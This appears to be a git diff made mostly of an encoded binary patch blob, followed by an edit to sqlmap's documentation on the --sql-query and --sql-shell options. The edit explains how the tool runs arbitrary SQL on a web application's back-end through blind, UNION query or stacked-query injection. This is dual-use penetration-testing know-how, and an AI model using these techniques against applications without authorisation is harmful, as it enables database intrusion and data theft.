zkHVm#`hiCQQ-jSTU|}>g@FUQ9Xw*Mk{m-@F(HNMF@gQzNMS@4efE)1FNF;0%4A>dE zF^DsNevbs$kHHb)i-|C$!DEr|8)MOM&R{_Rfo_b&!-6e9Aw(<*IuVCN!4?A@gs~ss zf0&H%@aT=l!+;$Uj|ZOS?|n&sX90jnz`@u>_#cNMU|_z2vJ`e0fNEji1A!WH5fTy) zqCAZKL@dm;0>k+Wjr|732*6W8eFcDGFvmpz02Qj31Ox?SQT*TU9|RdI^d^7_IH)NS zKwO624rH_h$nB5->0seB^nWgx^j8uFCW34fq6-9o>0yUKBVb^RfJQ^v3Q`puOiTnc z0p;LQcr*-$5P*LCH}Ri&@IXWWum&b30tUVo zSPAUVBmxl@BmfD9bqGW>d@&L3f(amxfo?(sNb^sx2Z})m%r6C|@c&=-18Kt8MFgM( zs_DRt|I^^V6_|*`z&Am{Qx=d^;(z1TFZqKwgu=i!L1AHD4}edY8zue^ghWIGaQ3f^ z{}LT2f5CK%h#|p|3K3+7u)~084AljI0?<&CCE~E~O>h7pLl1*T{)MB#{r_V>$m(Gm z1D^tuCjnG!pdTcFVi}Bvhb3f0BH|D8r0^e98sNwWl!BnZ6O;=PP>}!{3W^B<4TdKH z4aNmPBa)!n3d)hFKeI2e1IT{in*cupv27HX2{mItgCS!;!~N}+|HFTPNQ6c)6atNc z!fHSR)sR0~4QP0%<)DDZKwU7Pf!f^fYfn*bhrvO$8qkOsh#RGZ5~y1SG?>Bx8hArM zOV3F{LE%40%E0{J_or-+1GO3`4UdJY9SSH8oIjup0Q(*Rl%go#`%SljTo6!Q1T-`h z!vGo<4KXx8!$Xr!Km$$^a%dz_li%%vqT4`x5RU(%;h=C4%)>)r2ny6LV4R`gZK(8t zJA}eiuoef(R?riII1gnPlA`g@c__Hr0keQssDK;zABRT&gN1+7Z6wfHh^PbN(F=h{UC@k zu-k!3FpNe7stH|7M8i1HSa$a4(J;Sl&$}{@ISc?_#6rf4FL@c zKMde1>@XO(;{xe0G&!dL7--#(1c)F*fyfR8ECOnZpm+ekF({%yFboQ`0HDANg~EYq z5_At7K}L{W!PGPr=W)+p@B<+vL6lF576780UU-dM#CW~P$Mj~s0?TX zm_q{j7)8XC`13EiL!r?am??tz2d#C1vNh<*L2nF}LUjQRk~G+%0h0Lda)0GE;DZ4A zLO%#xFl-Yn4i-|;01HDM62R7Q4g#ja_5ih2m~w$81`IHu@ff%+0I&i3AOWZn^dbaM zlZ4Sgr5VsD{QpnkK*j@OArW+#po>B20j69;;J+dBK>7anJcc4_6b3-P-@M~5`2!*j z1{grk0md#+!h%)+0CI&RB+x{HX+KD9U?z(}kr01kP09&TXlQ{H&~Px3U?_$Ry)iH+ z7#D!6fI1({Kcxq7|9{y}QC8SQ(5iyU4gT9@bb6le#3vjNMIln;2CIz4m2u&fkHM0Rcx4vfz}Yra=UeB?EprEC$p@e#M{vTrddHFyIN`2Tbn3 z=-^@kWips906YoR860Sd{(F&s@E_>P!O~+&R}Quql=z`R2Q=ki=^4;{ShT|tKw%5Q zK??qWnH@MF%=v&SF%18KP93y03HrT6*r5S{hB+Vbnuc<~U;O_!0)ppLFn9&Jd@vVG z>GDB+1?cj@4g-J`%pySJ{6F@K{*C`AZN7hH@>jJMBu*ggL)e9@2d^@ae|k6sh&b?!2-L2A=?sPc|FIur+ptqp z+#dACAf1BE164ElJXn<&g$Jzujf21B4~TFN2Rd+YE`Zz<>Xt!;6Bc^$1U$4)3aUT| z7@Wrw0smo&M1)5`{QoGWfinB=Hvx=9fSL^mpAc?QVh+^oKmp{hWCh&+U-pAQ3DaQE zH-S}p37|#;Jv4Yo1;YlQ1P)(I!P>takivhEr2cLazghu+241ZFHu2XyG`uQ8K*OFB zfV2s?8rWKR4GHwsNHBCuz+hkrBxtO`=K){`V>K3@MT3GY%A}niJeGqg9C(HUfl{Cj4Dx6wXFxQ7wIBdI{U_M{hyN%s2X<;Sc=rKe zD`&>MicU=YI~oCf$0KsZ>H3$#RGi6)RREYAl45Qg=LKz0!C2p)>z zpqB$Quo!~>01>F+pEm|HBGe*)n#0^O8Ue!M@3sw07SLch1E7I)_U}FZ!GC}V%jp3P zJf(&n2E0Xp(SSRH=n*J)0tlzo52pMPC2cybQ&aDWDTDgu;xK_i!_EUNhbPO%hKR%Y?`IpgKy@8#gg0`|lbP%QiRYZ+>@{2$1(EB62Z delta 23259 zcmaib2RPQ<|G%w}jEt;o%DVRuvPVXxNFgIzHc`ec3K^-4n}k$G$d0m#l%2h2p)$&D zm;bpv-{+}5pWk);yDnG9`JDM)=kidv$w4FH=|0eBMcm#p1}v_R#Jp@s7BU zX|GsXsnOA^H_Sx`uAq+YabMW8OW<9}+EGG;+EtmD9a^aIY&YtkUtS3%>ZP8a=>HT> zyq*5t>{W|@k-*f~vunX&ujdaAUyb6FP-)bABa2U1XP#=M+IqFhu5bHJ`?#9`_sbR8 z+vTmftsd*GOL7fHVK=W|eidYIcQldI{Vdh-)f4_Z4|t?Hev0t=hYbK(+Z*$DOY}i+ ztr)s%hW6Q)ns5_^jCP1)s6y{vAAV-{LA&&5$(^FKmSKg|hPTTEbyGQHBF`u9`lKVm!zxRiOO2_$MhX`J|{#txVbW_C&my~DP zrlC7MlFP}w^7i84tL^;jMnO|2*^WzDzwoP{ef#sCs6KgN3$L*lKN~sC)>Bj4R`KM` zn&;7k-O8U`ljx3yOy4}95gPX_Gv|ydP1R)EBkwZ}G#&jrH8uyWYX_CA9%dKrc0?zU z6a-%G5Hkqn?J@{+tU>Gf#K3xf|ylKRUkTJ=KSdYern;9(L!J z|4r@0r+NBpy-{V41LXoPNDL`19vt^h&#!EhoktLusMuY$GGwdWzo2+Ldw$9$ADE)w zN75`lhp%lVE4p*HS}ZkhS@uZQeIU}_8f^PkQ(`6ap;J_$&*30~IPdVf&aT%)aR-kT`Cp8>uI}JEDJK*W(K0=r=cY=@6kK)rp)- z-)l~2Ze$CrJ>Q-8}U6SK)*z|ZEW z!o*&FkNWng^K${wV~?tnzvhSS-H~KLvrEXr>%d8du%7xv?N7IIPeq0l4!3sSH|Z%d z&DSCYbAPaX?9|TTX=CvIDb~o!w5PFqa;g1*x5(ol*?q}3S+ggeVYGEUrJNJUCu@v? z%?uEGe7?=i+7)Y_2%f!rZXoET^*rB}bnVfkjkHZY{=^ARBbf)e{!h&b(v?0+5&JDI z4Qtc{5e`RBhVu2>JnRmyb`Y{G5RE`gx`lrmBspob++!Kc%M)8nX1k|1BFtiDIv8tj z60L;hVLKOJ@QYt!^8152Nt$aOMRn6w`m z7&Re1F!sRDO{z=SFtpko~VpFbK$jHLP(#V+_&4$tmSp&{EnG9UnDh0mTNoGvEjSbYZqg_v-SyViyJA% zcU?PjZK|VrR75p|&EKwOPrlsb`v+|Y7k%e?FN?O_wV9iA(%`P-UaW2*KRCSXYM#Md zH&MWysjeTi{+RV-F{*P+QtowNH=4@Rwm@d&6YrxN40m2H__(WgW3@g9YRD{_vXZoR zFg_I(jFS2h%O;{7w(sX&YNP7!cP}(#a$I|tK%#1>X=x;jgiv#mZ?n<#(&OaO2rSu$ zohF$ULqw5#ion@n=H@YmWBc{dN@NeMtOC|By5Bt1wx!z6ja}SzhK07*`nsFqprn4Z zW^?D$snyP;JyL#k=NCU^y}nU>P{m(KXdll(JnQ+8j}xDE#14xXy(iklvR^&xSiNLv zdDf9((L*5COn~T`{m9phts#ZTQ&&~Dueq-0s?KfR7ngVlGo&Y<)Q%YhJ1Y4US?t>t zajav!UGd55@Ws`%o}H`w-#X&i9Hx)D1{!Ba?y5KvSK>ddIW1$|J9Pb6^p0#})z}xK z@BG8FmcP1RP~g@on!BhvK6WlOF|T$==6RA(rrc%e-8y0%fl+kqqEP{N474Bh?vrz6 z)5cr;$aqVW6tfoTOZpV1gf@z}!!#9HC39wP^YTu6l;n<7_O87gyKm}Y%N%){bDI^K zPnRB2h_3f;8h@RBMy$=-$v`>cjdXX;$sJj)n_N}FXXLme+vh}VhDKiuES7Vs`nl)$ z$mhghp7xZ-ROM<9Q`xxF29ImrCsLb*`QBsw4hOZ& zy^dx7xYlLRg!0PFEWdej{qE_t)QpR-n@{A_4lfi7&r|0-D17?_eqw3f{=m&!s-R zr)BJFbLzynqHYJZ6yGnUxe=CB^hw6NIlo)>r`uv4nOe@-qkbM&$Z3pyGJJZayn@?V zg{xCNS<2(+o{P76Pqd29d{9X0A3RyW`NXI!`L(ONd-M3SN+GvrB>aoFUnEc6>iVSn zZ7ciU2ksBKihN_O?c@(mR*Ru;^8AFnhKWLh#0=(LKhlW&PGW%pU)zce%hlS+k=BJO zDSl6Cuk6o1AE&`f8(`8=<4flxeRbmdC7y;CLkSO-tc~-CWcArs1r669mo><5@|5bv z*(dj_>;KRwlSQ*i=Sh(=g`IEeagMAe)}ZvY+yp)4Qa&Ac(SJ@xJmr!4eIAGTK!g3o zcX%4^b~ju&BSvWB6=i>S?V_Dlen&RfdJyU& z_MWPH=re3u+9Y?lt+K@0u%$}BPWbS^IGJw+KUBWic(~v+)_DJdHYwjC&tJDF`|G}- z1HFw-%qmIza%+1~(wRKm)$dBI9vQj1%i+YFjBZL^Je?$nKC^TRKym zsA!l!zIpgA<6eD-jx%x1Pn|S2-{&=&r8Y2>miUCFvIbn%%-X zi(fy*H=DoSzUIT*HECT3*@Oe9yc=X_h0`}5{Ziy&u9MtHSm!<=(~#Aj>s=rx{JJrv zy-bHLIq2$rW4vlxK^t3>bLq`E-@(_u>%=CzeW_Pl&)a?-eUAAufgz1QEVGz=ejxRJ z_pRm6RIJ5=N)MCMmby-!8dPTdBpv#RsH;Az7_E@r++SOF#GaL~9Ep-KzG3jJ)V_19 zabcFLVyv#BVeZ7;E$w8vEzxIQ=|KIqZ15r zBwJs+$aEx|bzw{4>tht|#4rYTca9wFx6Qa$afDGDE7utIWp(aH zt*VI2U!`Niigg|{agE%IW%iAXM-(v*$2ZqKr7FF>gIpRy$657_mj+8sgC`{P@a`wg zo%|=Z#f%eW>4%x5{3==Jt8w#@BFqdga^&O&^(FE%wtil#O%OPExbnPQ ziOoKi)wz#fRz3!N9`;GT_AZFD@+S+lkk4 zulX+pwzP9Tu2|mb?;|ZbG~Qz1pl8ECsvnc4f18o2x8x8b*uxjk_U09PXlUH)9UhEd zgQe^3Li!zb?r}c!HsP(g#g<6WFT1NI-TKU{)Y?YC*P&43VQNBFhe z*F%z|xH3{ORlYalo}Qv<;M18HNIUOfosHptmTtX6M|ApJhe-C5E_Jn6A5rQTdpk*S zrkPw0S6EUzo?W@0G9w%=eEpUd0=Gk4HCe@_XoT@zIk47axI@5QMg#RG(pHlYddYk-pE7sm~&Qz5^}- z#bu2}hj|*Qb`(Ch8GQKtP9BqhTzjF}8`9BSzY+Q4x5q&FKoz0hxUDIl;f`}fRK@%_1(E zXuUtsFuh+tJKlfcjmFf^i>+E6N_kDwNJ-HHoL0xNqwg#3=l7{j4)1Xsh*%IGD3p3Y z8XQ>dVULt*dLHHVQq6QlEQmvAfP+DYYNe{MyYO(qyOAH}lU!r$EsekOieoN)m-(E% zDU)=@{MoFkM5K<1_><9Mn}Id_`nXEv?e^8DPi}iev|Wf)x=8g^EFfH{IEbqF;kZMI zmdr$@=p4t>U##aM%J&&ene}bnv}IFt_7x&c(v}%9)djMdFm48Q@7`${PxD~r zMqZa2p(LA^jGOhMbuouK%d~JByjp2fc^7pq^)4?c@2_=6E8DGN%6(a- z%Snk|oKahvVoPLl)n3oLZW>pKJ9L+^fagqO?+s^kJ^iF{^{%|nc+TnNCk6L= zNCaaurYxPqLZ6g-M-PlOZtR>`+CTPcU^Mys*|B)9%Olb}cIB=&$FIa9=E6f0H(4ES zZN@b(-nyf+YgF3L@Z6nF)wj2lyEo60s_xyQudUk09O_;oeJhdcqsJ*WgF%Oz8xw-2 z24~WiYdd8Ea9M00U02lVUh!Qym@K`-?~+$VQmf=Bu^YI)f2Q$!)63n;Z`Eva&v^Y> z8)z5dlTd$Yf5a^#OKaws&jZQ!auee;1kHfjWcXZvyt<@j#p06;W;N4d^tyOwo^MGtE!44!-qx<-H^VP&ynhh3MP+i`>e_+Y(G3<6Ya!-lT53VYSe?vB(PxjEXRe91 zD5$cpb-uf^;}=2;;q1EL%H+4UH_PajgXN&lZ8zrP7u30>ZeL$~wvD`9@l()2#PS!S z+&b2B_rP45-T8yY^wa@fYYQ}|89v*MUm27oeJ06;7)I5-YNPUc9hCbsvo2>|eg2fo z@e7eO=O)CKd#Quu`k!Qc{LZ#jojNk(F7Q5e@Ij3bz3b=O-!|C8p1)YxwQmle+!4BA z!Tt;*QhkH`Xo1Kk;St7q%FYEV#n+dF)YmP$c4|+{IdSg1F_HegUOc)EwhBJ9_j^tu z`^;}ElYY+Mci&;+P1`FdHZG+ah{xN|&L=O0QCYTB?2f5Lk4{{09zK=HZT3=Sa&xe! z`TJh3#|m8`7yU!r-w(~x%__)udh-8hr4KnmN~y&jTv3=>XHiB!b(|2Aep9JXUDuG? zrg*q~_pi+{p1vySfHh|O(yPz7U(SbjrIEt$)zhSoRx!U*3r7&gAMlwOOiIZ1KmKWV z>65ANmLo!MpiuU0r|_wtvFw=QUnH&u6QaK9r@<{ktj!N+n;$g0y{c@t{G{!lezuC6 z!LuJ?&Ivp6Q}yBu4||KYH%CVO^@P$cslJ5r1W#|t+JLqrLV=pUrkEZ@{p{j!-FkY| zcbUC;o^h@rlVJy{vg(EijSe*p21!Qp(STFYEbz#fF5A|j%*N`2J9F~|i~T-w97 z-q+D$zH;Yyl15S~x#{GX>yOa4V^f8Wh6&cv&IAc#W|#Qe6ARaI53d1*pTAnSogWE&e;P|di8Buy=%=V zX@klBXkYF%TwF!!$CTjb>!~4U7h$>g_66mVn-J$6ssdq6Mwac#N7Gs5c zLIuOUe(}V%tF0;VO3k^9Gkx{1hp*Ltrf#l2vT>8=F>m^Znc4R%A71at{iH8&^#o%+ zi|up4{YIfBi6)DR z0-s6y(%U#~8}=DQ{UD8GP>Ts2uTg$}uXTRa{C0Nxnj+Hms$S&k7B+0>(>?9(eZTfb zT`MOEMlF3+>j*Ea<!HbU<3DL}e8wogWy4S7 zJx!HAkRyQxf`J_Ul}9oqY(~)5mc?Jb)EJt5+mknvEJ1doeT`1C_(aVwth=;GxE?PUgukX*ALqdWN}T8`B3&;Zuow;*@7#zvfNggXIWd2rA$&-WZ`Pr{N$}pw)m$x;xtj0> zmk4U)-o#x$g)^VqQ89$XmbZ2Ad@Ue+OZsvDGA~EvVv{tFMUGCnf1jy7eOL$DBPxgb zgGZW&V4r`{<>9ZVmEEGIO+qh!8Y1%1f6NIR`MT4HWaq?nduw;Q!sBgr z^_#`uft{p|=iS!A53m2)c~hQ0TkRd$&-8(C;%uczW@Pn!NRH{+$>-*|id zp|7iy@N!W8;En0Dy}sm3L$QgAl1HtS^s}CIGJA3AM3bcA-o@a$h)SAmSm*Q;UhA3| zWKye9MbH)B^4;MEdrO1vciDZUO+I8>?Bl2q_-wL-emUk*s7_JJi_;!?9XKzELvK$@ zPY0hV>hYZr_w?NxFqs_i*fX)jGmgtmvoTL^2I6Ilk~uUPshN zYt%ZL=8|{s`4MvdA@Af+%CFBE?W+}^@r>rxyT~9!@2N7}Pa{c9i^CzvYEsnFq!%E4 z8P#R`^{TkUh=+Rrx!Oc4beA0!KwU5_IV?UmHMJBYsA0(QNJ@}n ztzPMS$5O}AQel1vm&ucSr4xuC6MC8C9J6cDB{R}}C8+9?T>D-gl0G1M?V*y_i9EKx zh-KrwCsa&cMJ6Ta?~-BlHt0MNfo>pWiRs`Ivx;L~81nIMk^LVzJd74UKi@4y9+sZI zY9p3Jm8HthVtg#y<(b<7oV8(NiQ(PF9gB*t!s-I0IdxIt`<3mPZH{re-gzjW!{9#T zwtLY~1MQM_S^JDGf1!?xjDlW95YlJlX&w8+fuP&6N{2!??u`AqGRA{`XXS6ENpieD zMUEB}oYJo+=)H5jrJI%I@g><~Y@q{bqAr>IwjkkZq{&#Caq|XJLZLSsqo;Oh6P-SD zH2h++AvA9=wHJHyP-e(#*vk{?XgN!}|nt{q#N)PW_2}XC9w!{OD&{ z`~tlyIOtY4sK}G<+(G5cro++n^!{7YPWFRYVLK~!q1S(Qo?m&u>|~9;9&J#dDbubx z{OaWW$%{sPed*VU8xy-F3{7q@sEzg;*rg>4|2SUlmL{L_rZBzV>x0eSi!v3X(Kp^| z2W^?%pI_LRr8~&im=lL+3>{d}Yh0Cj&CMruXPOXYTyeVa7t;^)k4SN68t%7gtzjg2 zviH)lpn(q84*C-FB0lS>_B?*n*>bATm&(l?b`NqkQ0!ma-{qiZ6FT1%#$NKs&*I*# zQ+BFnGk{+4VR-Y;;|=&Qv-?rM4h^|aaq*QjppDM^tMGn0SXbbc>;F2$M&mWlgGVZ-$CBGJovwS(_zANHp?7h>pStq_%zo@!m@?|c_p03JYxz&@+*dd=|T#MOa zlJ9Xg@BEin_RB?MTx%$E=D31LryBQVmw=yT(ezci=$o_*V_wg?1|8d3ckb7Fth02R zWS8vmGVbKN5v zmAmTAsXen}&~eCECB^-u@75lM9@#UrgblOvf>M3-yOjIuKTJ++Fa$Dkde`8omu_Ag zaq}}(KAhhhG2%>3)xnfpe!zO~EEl?S=nN^*xZ1T1zXtM~6Cw@SY4-Gp}Nq11c+y3B8^nnT*U zM#|N3Dk~4_;M;YLIN6-Ye#k0_)<1D7Kq2(8^Q2jKg|HRdM3LL#Ez1~u;Y@$ZSgmda zC-+B|8}fFvZGw&Mf`h4UclZ0GR4{xkRgMx-xUrtaqh=`B8%1h8>{I@}rQgo^_PK<_h`Sujb`p~LoXAge zIWl}tYzv?FpDs&iQA{vAFgPdq#y&%8v1U`dS4FNiQ3Vwnh03d{2;0Q!>o8Q7w|%%n z_6;*=Zn4&5y8o5o$+JDPiP9TQvU59yIqc($Ms=UBm_5Ul$*x~v8l;tZ7(QDwoqfoZ zbS81hq~ziSdRMck;n6LVhSM#mRg!sw3)QbprsPa7hag7w!Vf|{h1Fb;y3;L|2Hx|v`TT|+)1LWl&9xi)0I%l5V<6GVG z`POoU^mRe|`F8;cML0G~Tk;G2nSd=;(qR5KW*4`!dyj<(@8W*p?C|6Za>c&$*>V0U z9aVD3P0J8sYjp{|c)D~Sm+K+=Q+FOZGkslPKXLtX>=R9oV@LForr#vZ*<6?OC2BnV zK&3`f_>63CjGS8UecyY(QPB9tJK0y^ajEs+#_~1OJZ~y@o1Hn^Z@;jYv0p5EVXytd z4g7=V^nmJpncA;|d)=uml#15y#-?21#To4%lM6jEGc8I=Ru){Aj21`ryGqOWcE6uA zKDNFPm*l)5dy?LKS8N=EDKcoME6+xRZH;Vs4de5+rj?OkdoG;|%U!j-kgi9WUQC(er+rdY){>(rAjFX98gSLdHB?y7ck7*80B z5@#n##5WN+0w0FP@4PyWSi34#smr;jaX4i$#ltg+;f=^1eFJTq=_dLxuVQrS(wzZk ztei;ZqnhVNkwZBn)(f;TG55Ole@^2{f<-I%XiHTF*vob+2yP8(=8qgS>^!q0?fg^! z8)U?;FY_NRM_jtBXR{L%nEqPpWW@L2(S@qZ(xmCxy>j6fq(g7hMnCx>@VMva4W7@+ zO)1~!Z(H7Ob!oWOluy@o)UkD^eB)lO5HE)zV))_Nj@oMeBYe9^9D~#G?R<|k2b-Kv zuzL9hr#0!lw7aCHe!JIBR{YhToF&GtbhdUizIP>YiZ^8~N-HfQ9m}E~cd+M69_CAM zny4iqNikUxpT!QE5gVq<%Dwkkq-(ww^D8q(#hT&NKOI-d;*8&+%;CB5=Iq|Z1>x&9 z4#l$!UOPL7mv+_oTvB8npR5om=X=M+TkIEQqOwTORGQR2Xj>woU8_#_tJg^L*{PJa zB|5z6`;88E3qz@1LWc{&O8nHG(u4NI%g6N&984j}&CjMkzcHD?kye~I;Vk1QlNIG{d!Wo@CQ+vhZwK~0Yb?oAp ziI{aF$Dx3F<<^Mk+vrou%Nl&+F#;zS%fg=M-!r2r{7D;z?p(a1)nrO?l@t@ zy_{l0%5q44@cG-J)4^E*-V!mb7Ag`wvc3f&4>$_Sv!dcZbVQ);1a{R$Jv|$dX82}{ zIfGm#8I99n8}esp$UfL?O49eg`}3m`U$eL#uDSbYj7`*`*Hl^(qIn^^y5pHM7PE^E z%5?9xqV?5btJM#;Hf>Z89^Fe-rKFtsi>qZY*@WRMvoG1;z(0=Ji=~mKrUqW>N4=jk zaB}eoKap)Kb`7u&p=K1XTMr&Udhs#CmFR#6LGu+bFI`HVMZ0J^xr>w%Y*hh&6 zb}2+z%f`mEzH6;%zZyJ?603akY*%c%1ZjTSv?F-N+s48$*wsP16#ug~8*h6)_-l`f z?XPRK?{t!9E~(#SJ!bbtdPvpZT2q)mK-%@L}xIQtTZS539C65voOtjsK9!Jb@vIj zYw;?+lFRvO@qO2@LPi1F!d)-@|{`}L&!iMz+ZP@Fnj5D;tay}=EdwP4mj_f~H z_x_^md(DFjKS*h{n=9)hKI!|~Gd?dn7W0piNH2FV3@hHPyE7b4dR8 z^9gIFTDxQ8=&#>?J=B`l=aCdx{UkbzQCX%Z|7&eajnT%>0&BrZdn8rBlX0h&qb6xR zYkj))x#sEv5!XH@tdIIC%bZu|)rhINZ@2H$OH15D$GGR|-I&&1rky-tQc(#q+E3fK z?&y+gG6HDE>oQZ%-J&^$yE3eyB5wNtxv=IrA?Ro}drBl`^Fx;R>bUdAQz5+0rA0>q zk43w@)jn8>XCUOF0?t?3bQw~POwDg6yT9hYM6G1PN6?TXH{iw+Cv zo+=Mz^zHl5yydo2{zyZrFoP>XeMcg9gteC3^L9pDHX2uzJbbrLmeVqK&xd+7)%Zp8 zB2Ev|rWp(N!s^EDUfxT&gcaw=hRAR2-Yg_-1MzIFJ6Y?F!rjb#+WCuDpOoixEgsmr z|D=$*rn+T>mEe#^gP_mV8vc2VgnL;F)ALZ(=IiKqueQ|Y+Igi;1pSmD^$oIq%$~K3 z^I;D5ryHIxW{tAn3y)eHj&3mits(1dpjRmNkasb%dUjI7@~(%QrAqIseR3MtyxNr)q~#PZIo*q2m|szm9lO<3>7OK&M(#QU9qKmXh}nZ z$Atm&&it=(RzKP%*}lkx<7pTWl}c|_>JJ&NXI;rIk-KP6HgVsw%Jc}!y3tcfJHAA| zT3xXu2F?8~?-!q8I+5qihl0H`2`e}5PuK>FAiHGvSuYKMJA`Ns*1YeR8+43HaybLv zpRS=L31>BzJ`T!!ywVdEDoCG4r6x!d`kZlpAoa;nW~w4;6NViMJA*OgD(toqPt#lq)VAe)-AHo1X+#G)^DXFHb6wcxQjEhYE9fHyhPu zUYg1Wi;eQPUMy;_)7)VX5_dl9M0F&A?3H9TqjHw?Mb~&n(K*pfLCTI7<(oqMlEf)H zR3mq$>`duo#pX{2F3%rtSXR;|e#ABoEDx8E#BOG-ONp|gJX zd!>H*pw)%5$7gkw9@gJ_o1Zbn?3>}j{ELxZRl44CAn9?}YwyBuCpjZ?uf%3Cl0v+z z8#1i}gh_3g&Ufp=Pkx^idSWu`qj+ZHt?H*MKe2v8Qx#=V$K-s}3#Si7)eL0HPdl?3 zRXSTO-=ZFQ^3cS|r|T7!3H=4XgR^!m4Tn8Tm?n3A`8h1_QnoI1OFPr$J9peZS!d5H z%?A6=WzP-tX$x9*v3`Bt-fA^1+tb8k?{4Sg>uqo2Motr<*-5^lOw+@Fz{;cXSh9r* z4T=GS$ID|8k%=la;D@#me0=nQF51T6UrrGO+7$+|Bo1r&~)LMb571oHcrbOv--B8EsNG*e0h zz@}$6O4o=f_3t~qLc_21lei3gva2?kGD%W z9D%%}3v|Gu@nkbf0fQxw^C$&04hV}e_uXJj6p@H06M85m z0%#t!UBVM^P1YTtQ{+Zsgb|c~!tTOMl>gBPBn}8X zWq^*zgT*3YAF)_8`TYPLfftZv1lZSYIS+!b1Of&R`%1B;sO_&r1bkW)cq%sh&sQ7* z))xs>DLn)hg+RgwMi6o20Ln)c1`F#6_C#(O0&BuziD>9o1Q8e&?=T&aTq;PoBI070XRU{EbL?g&Y zU(@;Q#Sw|n4TIibBUR(C={jkE@1d#+XX*CR00To*wY;UHr=dk*2vyzh>F!X|0cXdO zeHZ9Tf#Kt-q!%e)F$7E%;sYHG4FfQA90FBESf=|(P5A|nLR87F{_ht8kg4!Goed8L z4>2}i$tdtKWt~of1T5!o`5@7FG#b_ckHkXc2nN9tAYuW1fr_Bx5itZDtPYLbmKo`{ ze}K*y3~WFm1_e<$5`#qHA?60^5JcEUh*(%1=!^VwF<^cK5`zYY0$Cvjjf5&4OoE1q z67+>i3n+q!{d1D-IWWM#p>tr+Bs_H07&Mv)+c5@1gbj$p;h-wP;9%yC#9(kxw?JZW z7~(%_BK;ShkQgEYraPcH_>OUS0&IZfPxwghKM9W zRf0t#VQRtx)j|7W(O4W*s#r7<8o)rbz#vJm6{4~KSmqyw3I0q23)>wQ0}Yo*EE z7!*{iI1~W^5iSyk#3NwiAuxDKJBqjeCvY4JhlcHk61QO!6XE*?Rsvff&;e{b4C2rD zN|_&^01Sw~&`E$x!aIXg3EB>eg6|lMh4~KvgfRcX;Ydg%Y!Vy>1+N1T2|6(zfr2d> zM0;3YJWw92FA=pZEwKOJ;wJ#O3vEdFKg3EPK+jJk4umS0j*0(=REap`pY15}r@fZ{a zHUtPkPy@k(ECRL@fNo(@0GOO&NPqb(9*csVtN_iyf+QY`gJBa8=3sCD7%LH`I~?{; z-TmXUcwlm{9piy3LnQ;m0FxH}|5yy3_-A0)jth7K>Mv{EHdX=&gMkf502mfJF~FlR z@e`4-Fp3A67i=R$a7sbPBNF}zQh)j^0fB(&j(|YJ4nhI~OMr?Mcrg;{b_65>58WIA ziAMjqxow{%AaRI4D=DHOAPKN|3nYku?t}pHP}pLC>p)dU0Ldb34m6Sk(-Q$W3v56% z?oXrH)+abaVR)7R%mXF`0MTIMVE_u>R>>a-jesFSvm+$X5(?^01b{hUlVI^Ms7U}G z0gcrJ5WfGiBOrfpY6CC_F%TduSo9&_h%n4S0CDfH0V(4FFM+8E4?nj7s>G9Eoq>{J zs|HCiOoWuxKo?CQ!ut~8;TAa4zwLe_Gy)M0?+75KKrNVvfa@5f1hsyk5ZHM@1Ox-rW{7w^%-@Lw zK!yFiVG=l@L5}x#C8)#w&p&@78Y1C;Fy{}H0~`znGC_6-R|$~-#eaY_q=3im^XI=w zKqX8Hpbkz@AP|JVGc5$LN+be42?)0kb%J)d-)>C$hrI%oFc^#ikPsS{K^@4`{+1S~ z!$To7io%CMR08VI&^Uu4QPK{G1%rlwdV@}aK|-w>q!w5NM0KDJ1Yu}jkeI^8!-5zr zyp2Ep5I;EB{`OBGRsb?#liTBv1!nFmyly60T1`gu-?Vx#h_snGiV17T!4{=rsaSILJ&x>0RepiHA0Yj!dwwhNbns4yM%fZ z*c;5KQCNUl|B>o{_z&P>5bL3$1{4(3kWk>fg0}90h1`XIs*nUt%nDe2*WgS#L!0ND2%K?ccTowRH{IOxm{9x4> z5Y_(D0;LYd!Gk&wTcGW*;F=Fs2ksSNbp*Hs0Ye9KDl`CNFe!lK>yK6cvuGSZuh2>G zfT@Ai;bHL*4S3Y;1%mzm7C!+E<*R^`0?HRUARupGI|lg)Y%xU88`>Ad%|FMZ$R7nR zK%jIshy+L&M8JTXSm=Nlz$id%0YniPCIV+Il-8n9Y*H{U1*QOln&8jQR(Atu0Ra@M z1;B#+!*%{4NU%z1+5=h

#HI0YJt>1cX6j{-Q%D@&Ps5H<*7p3!sVM>!h@V4hWcL zs4ZduScOfDh0&zo4j4Rp_&we~&Vm6q7ceb=YfE??xE=i6dD~_I7YMx-1ECxwSI~BN z7()fZJD4A8cVHuMaRE;MPaE47A;=P;F$fEeYv_1b1O^5q0WtXxB?spJ&shLL0<%Ss z2tf%#kQ`xP&H_kp7ytkV6-+XK=KqT(rN|$J1?M$Xtl(Dc-{b4|0zt5X>K#0Oca4mi)Yef$B9 zuz*yCNda70K;08dA<`kng#|1ytQ|PEVD>=({`qHLAb%8ijsxE@xSoJoFd#l)?g`K| z%yYmk8W! zpCW+wXu$5EbAa5KqJ2uF{x5*xQE+&J|34x&9za;AfIw0XgDrrMh1oVB*#CSZLzy3t zZ~(%>q<{f*I&{_Gkb>GQKpe18fCpI;tQ|}zzBi|573GK4+smGA-EL4 z%&?6B--Br%Ft^+7!2W-WA7s|BiGkU{Is@t)UI%B$fOWt&0#1*=F1sl52X7VN!4KS& z!BP?e2=~whf}1iJoeR!=G<1Ok!1+J}CwO@WA|*uBAQHeQ1~dlLg2B@qn8ATpBrpkr zH*nBDN z(LfgiRs(AXa-R|wF0r7up(qMmf!YVSh=REj5!@9(#ZLrj88k?Nw_6Zt0sA8Y z)(5&mB6!{ewRFHs!*D7QxG~h<0a*uw93a7jQNcuz7~vq7Sb&4W!9-0tqF{@`g1Z%n zsEObdg-HRNJ+RGz7u5f%>EDwYJpDpKcL(ZVZ%#oS$UFa@m{JGz2sB9BpcHs)T@0SA)=$UD1&CRQ>44_so_0FUV;~4ZECW3KMgDm# zQTz$i!4NN~120seGZM%mJ>WeGxb=sq30xY1D+y?GI7qI# z-L_v!DF62?0i9uwlK=$@V^u*N?2ei8z7!^XfZw4;4ch(1&Qq=h!IKM+SwakxQU|38 zK^^7Yb?rWSO=}`}ysCy%Lj$~x#AA?Zc#M`d9Run your own SQL statement - -

Options: --sql-query and --sql-shell

The SQL query and the SQL shell features makes the user able to run -whatever SELECT statement on the web application's back-end -database management system and retrieve its output. +custom SQL statement on the web application's back-end database management. +sqlmap automatically recognize the type of SQL statement provided and +choose which SQL injection technique to use to execute it: if it is a +SELECT statement it will retrieve its output through the blind SQL +injection or UNION query SQL injection technique depending on the user's +options, otherwise it will execute the query through the stacked query +SQL injection technique if the web application supports multiple +statements on the back-end database management system.

